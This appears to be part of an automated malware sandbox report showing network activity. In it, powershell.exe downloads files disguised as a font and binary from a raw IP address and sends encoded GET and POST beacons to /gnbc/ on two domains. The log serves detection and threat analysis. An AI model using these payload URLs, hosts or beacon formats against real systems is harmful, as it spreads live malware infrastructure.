        Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: global trafficHTTP traffic detected: GET /Licences.ttf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /vhhJQWfiJN142.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /gnbc/?3rIdN=L9JeOsoYfW7LuiHbEV4XUwbpY14lK3MC8gDNcZo86ZNgoJ0Ky4PaH7DNod07P46PC5yTK57EcxKk26T8ts7dMYkzgYfCCfwx/idEgCEytip/UDtQtUPltR4=&-vl=m8zDpnb8Q0wTDj9 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeHost: www.tyaer.comUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
        Source: global trafficHTTP traffic detected: GET /gnbc/?3rIdN=CFA+HkVxdb5EmOTiyKzJRx18y6HwiaTX//sAjaoe71zU1jru2C8H4zLuCGW9CrkOmabuxLOltM6mSwZ40cUW36eaDQ/OtyT9g3qPq0qmgtUTW0WFBiYRpF0=&-vl=m8zDpnb8Q0wTDj9 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeHost: www.theplays.shopUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
        Source: unknownDNS traffic detected: queries for: www.tyaer.com
        Source: unknownHTTP traffic detected: POST /gnbc/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,enContent-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 202Cache-Control: no-cacheHost: www.theplays.shopOrigin: http://www.theplays.shopReferer: http://www.theplays.shop/gnbc/User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4Data Raw: 33 72 49 64 4e 3d 50 48 6f 65 45 53 6c 53 62 5a 64 4c 6c 4d 4b 53 68 4b 4b 35 54 67 5a 78 34 35 72 41 6d 4d 4c 54 2b 49 38 48 6c 38 30 36 72 48 2b 52 67 7a 62 68 6e 6e 31 53 2b 54 37 4b 43 69 43 37 41 72 74 2f 69 35 6e 56 32 75 75 6c 67 38 50 38 66 58 74 36 32 4d 63 57 71 71 57 6e 43 78 6a 76 6f 53 48 39 78 79 2f 4f 70 52 65 57 31 63 49 79 4b 30 66 74 54 79 4a 4f 32 41 78 44 70 75 6f 4c 33 2f 57 7a 2f 67 51 55 61 66 71 75 74 65 36 75 6c 37 71 42 5a 33 76 30 33 55 49 2f 41 4f 65 61 4d 75 6c 59 44 6f 67 64 61 4a 2f 78 55 79 77 72 54 75 44 34 77 55 33 2b 50 55 33 6e 51 4e 70 75 74 79 44 71 2b 77 3d 3d Data Ascii: 3rIdN=PHoeESlSbZdLlMKShKK5TgZx45rAmMLT+I8Hl806rH+Rgzbhnn1S+T7KCiC7Art/i5nV2uulg8P8fXt62McWqqWnCxjvoSH9xy/OpReW1cIyK0ftTyJO2AxDpuoL3/Wz/gQUafqute6ul7qBZ3v03UI/AOeaMulYDogdaJ/xUywrTuD4wU3+PU3nQNputyDq+w==
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 24 Apr 2024 09:57:58 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Trace: 2B2C9B66440431D77EAAC586823BF5FDFE2BB634217B5550DC29F3FFC500Set-Cookie: _csrf=80c89093c88a4c32d4195643ece835d950e572e10e781462568b16bdb938eaefa%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22Y6jq5p23SqM48dU5y16ucWtW9H-p7Hrq%22%3B%7D; path=/; HttpOnlyData Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 59 78 50 53 52 4d 66 50 4a 48 6a 31 53 67 6a 50 72 35 6f 4d 47 58 6c 66 35 61 77 6f 49 41 62 51 45 30 6e 56 2d 71 5f 64 70 61 67 36 4a 62 67 31 38 72 38 57 53 36 59 37 52 66 75 58 5f 6c 6b 73 41 47 37 54 32 55 74 33 63 6f 63 71 41 66 69 4b 6d 4a 58 58 32 51 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 69 74 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 65 72 72 6f 72 22 3e 0a 0a 20 20 20 20 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 68 31 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 20 61 6c 65 72 74 2d 64 61 6e 67 65 72 22 3e 0a 20 20 20 20 20 20 20 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 68 65 20 61 62 6f 76 65 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 20 77 68 69 6c 65 20 74 68 65 20 57 65 62 20 73 65 72 76 65 72 20 77 61 73 20 70 72 6f 63 65 73 73 69 6e 67 20 79 6f 75 72 20 72 65 71 75 65 73 74 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 75 73 20 69 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2e 20 54 68 61 6e 6b 20 79 6f 75 2e 0a 20 20 20 20 3c 2f 70 3e 0a 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 09:58:47 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TGdQO6pq1G0TCdW2aoD9dlOTDesVWCM%2FMvz3lfDwOn5TCuDZshM4E8zhzaVZyvSCyWXYsihjLbQIL4aEZLoFhuT6jZisHObQxj5BwXu9%2FEGfm9kmOFHHUKUTQ9FPkCRZgjuUVw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87953c9fce98525d-LAXContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 09:58:50 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V29H4UtLu8kzzBDg4SXB1%2Bw4pUe0B%2FYRqX3L5oC8Xd9zdvEJBzgoAtTR96jsadXLI8gha5V3EKNt2avuGc1VIml5Jfrjp68V4y149N13zoGe4y2yyhqQuEeZxkVziFwl7UXHyQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87953cb08b9e7d8f-LAXContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 31 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7c 53 cb b2 9b 30 0c 5d 73 bf 42 a5 73 37 69 09 90 a4 4d 87 40 96 5d f6 1f 8c 2d c0 73 8d c5 60 25 37 69 a7 ff de e1 19 e8 34 dd 60 24 59 c7 47 47 52 fa 41 91 e4 7b 83 50 71 6d ce 2f e9 70 78 69 85 42 9d 5f 3c 2f ad 91 05 c8 4a b4 0e 39 f3 2f 5c 04 df 7c 08 1f 21 2b 6a cc fc ab c6 f7 86 5a f6 41 92 65 b4 9c f9 ef 5a 71 95 29 bc 6a 89 41 6f 7c 06 6d 35 6b 61 02 27 85 c1 2c de 46 13 14 6b 36 78 3e 44 07 f8 41 0c df e9 62 55 1a 0e ce 2e ec f8 3e fc 79 1b f8 d5 1d 5e 2d da 52 db 04 a2 53 6f 36 42 29 6d cb d9 ce e9 16 38 fd b3 77 e5 d4 2a 6c 83 9c 6e 7d ec 77 f7 e9 ca 1c 91 2a d4 65 c5 09 c4 51 f4 fa b8 90 93 ba 3f bb e0 15 64 b9 83 c7 04 e2 43 b3 80 dd 76 d5 0b 6d b1 1d 73 95 76 8d 11 f7 04 0a 83 b7 31 d9 e0 2d 50 ba 45 c9 9a 6c 02 92 cc a5 b6 43 4c 18 5d da 40 33 d6 2e 01 89 96 b1 3d 3d e1 30 56 1c 30 35 09 c4 bb 05 f5 ad a1 92 40 d7 e5 c0 01 00 60 a6 91 1b 92 6f a7 c9 dd 77 a5 07 5d 15 31 e7 7f 5a a3 0c 9a 4f 2f ae 52 fa 56 ad 5a 33 5c db 4d f2 ac 34 8b a7 f7 3c 49 86 da 04 3e ee f7 fb c1 61 90 19 db c0 35 42 f6 cd 8b d7 d4 14 3a 39 3e b3 04 fc fa 37 de f1 78 1c 1c 8c 37 0e 7a 59 d7 82 1a 6d 31 98 54 dd ad 9b 58 10 f1 dc c1 70 03 0d 39 3d f4 4a e4 8e cc 85 71 e2 5a f0 62 e2 98 a9 4e 60 3f 09 e3 3d d4 7d 3d c1 26 fc 8f 36 cf 48 2e 4b dc fd 8b e2 36 67 a3 ed db 48 75 2a 7e 17 89 2f 7b b1 80 56 28 a9 15 43 09 96 2c ce 40 69 38 6d 56 1a 8e 1b 9f 76 93 df 2f 9d d2 57 90 46 38 97 f9 f3 58 fb fd 12 2e 43 dd b0 f8 e7 3f 00 00 00 ff ff 0d 0a Data Ascii: 1ed|S0]sBs7iM@]-s`%7i4`$YGGRA{Pqm/pxiB_</J9/\|!+jZAeZq)jAo|m5ka',Fk6x>DAbU.>y^-RSo6B)m8w*ln}w*eQ?dCvmsv1-PElCL]@3.==0V05@`ow]1ZO/RVZ3\M4<I>a5B:9>7x7zYm1TXp9=JqZbN`?=}=&6H.K6gHu*~/{V(C,@i8mVv/WF8X.C?
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 09:58:53 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MKm88EOSbBkRGmcQUNXninC3PDBZMRCMC5b6X%2FEK8wQMVzTXO%2FKi7RcoHGs2T3mXp6u43Pf1sU67%2BSmQPqEocS9eOHsmTtjGqHlOtWlSzF4Mh6ObNIpWtsDPNUmVuf7VLLAkTQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87953cc15d922a9f-LAXContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 31 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7c 53 cb b2 9b 30 0c 5d 73 bf 42 a5 73 37 69 09 90 a4 4d 87 40 96 5d f6 1f 8c 2d c0 73 8d c5 60 25 37 69 a7 ff de e1 19 e8 34 dd 60 24 59 c7 47 47 52 fa 41 91 e4 7b 83 50 71 6d ce 2f e9 70 78 69 85 42 9d 5f 3c 2f ad 91 05 c8 4a b4 0e 39 f3 2f 5c 04 df 7c 08 1f 21 2b 6a cc fc ab c6 f7 86 5a f6 41 92 65 b4 9c f9 ef 5a 71 95 29 bc 6a 89 41 6f 7c 06 6d 35 6b 61 02 27 85 c1 2c de 46 13 14 6b 36 78 3e 44 07 f8 41 0c df e9 62 55 1a 0e ce 2e ec f8 3e fc 79 1b f8 d5 1d 5e 2d da 52 db 04 a2 53 6f 36 42 29 6d cb d9 ce e9 16 38 fd b3 77 e5 d4 2a 6c 83 9c 6e 7d ec 77 f7 e9 ca 1c 91 2a d4 65 c5 09 c4 51 f4 fa b8 90 93 ba 3f bb e0 15 64 b9 83 c7 04 e2 43 b3 80 dd 76 d5 0b 6d b1 1d 73 95 76 8d 11 f7 04 0a 83 b7 31 d9 e0 2d 50 ba 45 c9 9a 6c 02 92 cc a5 b6 43 4c 18 5d da 40 33 d6 2e 01 89 96 b1 3d 3d e1 30 56 1c 30 35 09 c4 bb 05 f5 ad a1 92 40 d7 e5 c0 01 00 60 a6 91 1b 92 6f a7 c9 dd 77 a5 07 5d 15 31 e7 7f 5a a3 0c 9a 4f 2f ae 52 fa 56 ad 5a 33 5c db 4d f2 ac 34 8b a7 f7 3c 49 86 da 04 3e ee f7 fb c1 61 90 19 db c0 35 42 f6 cd 8b d7 d4 14 3a 39 3e b3 04 fc fa 37 de f1 78 1c 1c 8c 37 0e 7a 59 d7 82 1a 6d 31 98 54 dd ad 9b 58 10 f1 dc c1 70 03 0d 39 3d f4 4a e4 8e cc 85 71 e2 5a f0 62 e2 98 a9 4e 60 3f 09 e3 3d d4 7d 3d c1 26 fc 8f 36 cf 48 2e 4b dc fd 8b e2 36 67 a3 ed db 48 75 2a 7e 17 89 2f 7b b1 80 56 28 a9 15 43 09 96 2c ce 40 69 38 6d 56 1a 8e 1b 9f 76 93 df 2f 9d d2 57 90 46 38 97 f9 f3 58 fb fd 12 2e 43 dd b0 f8 e7 3f 00 00 00 ff ff 0d 0a Data Ascii: 1ed|S0]sBs7iM@]-s`%7i4`$YGGRA{Pqm/pxiB_</J9/\|!+jZAeZq)jAo|m5ka',Fk6x>DAbU.>y^-RSo6B)m8w*ln}w*eQ?dCvmsv1-PElCL]@3.==0V05@`ow]1ZO/RVZ3\M4<I>a5B:9>7x7zYm1TXp9=JqZbN`?=}=&6H.K6gHu*~/{V(C,@i8mVv/WF8X.C?
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 09:58:55 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6mqhCtYPhcKQolffdsxmhPbRVJaIKjXqt6QNl2nfZpoLlD3eGaDWhLygLclMHX0j0rdKRbH65GREoodHcUVyIjeJIodHYTOg8rW%2BExA7WilKJRAG37fMoMOi%2Fo9zw89zYrDjxA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87953cd219a52f7c-LAXalt-svc: h3=":443"; ma=86400Data Raw: 34 34 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 09 09 09 09 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 09 09 09 09 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 32 25 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 2b 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 32 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 74 69 74 6c 65 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 30 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 31 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 64 65 73 Data Ascii: 448<!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {
        Source: powershell.exe, 00000006.00000002.20347450981.0000025A22DA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.20347450981.0000025A24460000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.20347450981.0000025A233DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163
        Source: powershell.exe, 00000006.00000002.20347450981.0000025A22B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163/Licences.ttf
        Source: powershell.exe, 0000000A.00000002.20084185803.0000000004FCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163/Licences.ttfpNBl
        Source: powershell.exe, 00000006.00000002.20347450981.0000025A244BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.H
        Source: powershell.exe, 00000006.00000002.20473581969.0000025A3AAD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: powershell.exe, 00000006.00000002.20473581969.0000025A3AAD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: powershell.exe, 00000006.00000002.20453370877.0000025A329E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.20088814752.0000000005EDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.20088814752.0000000006018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000006.00000002.20347450981.0000025A22B9E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.20084185803.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.20092124595.00000000078B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 0000000A.00000002.20084185803.0000000004FCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png4
        Source: powershell.exe, 00000006.00000002.20347450981.0000025A22B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngXz
        Source: powershell.exe, 00000006.00000002.20347450981.0000025A22971000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.20084185803.0000000004E71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000006.00000002.20347450981.0000025A22B9E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.20084185803.0000000004FCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 0000000A.00000002.20084185803.0000000004FCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html4
        Source: powershell.exe, 00000006.00000002.20347450981.0000025A22B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz
        Source: powershell.exe, 00000006.00000002.20473581969.0000025A3AAD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
        Source: powershell.exe, 0000000A.00000002.20247080329.000000006A5B2000.00000020.00000001.01000000.0000000D.sdmpString found in binary or memory: http://www.xmlspy.com)
        Source: powershell.exe, 00000006.00000002.20347450981.0000025A22971000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 0000000A.00000002.20084185803.0000000004E71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
        Source: powershell.exe, 0000000A.00000002.20088814752.0000000006018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 0000000A.00000002.20088814752.0000000006018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 0000000A.00000002.20088814752.0000000006018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: powershell.exe, 00000006.00000002.20347450981.0000025A22B9E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.20084185803.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.20092124595.00000000078B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 0000000A.00000002.20084185803.0000000004FCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester4
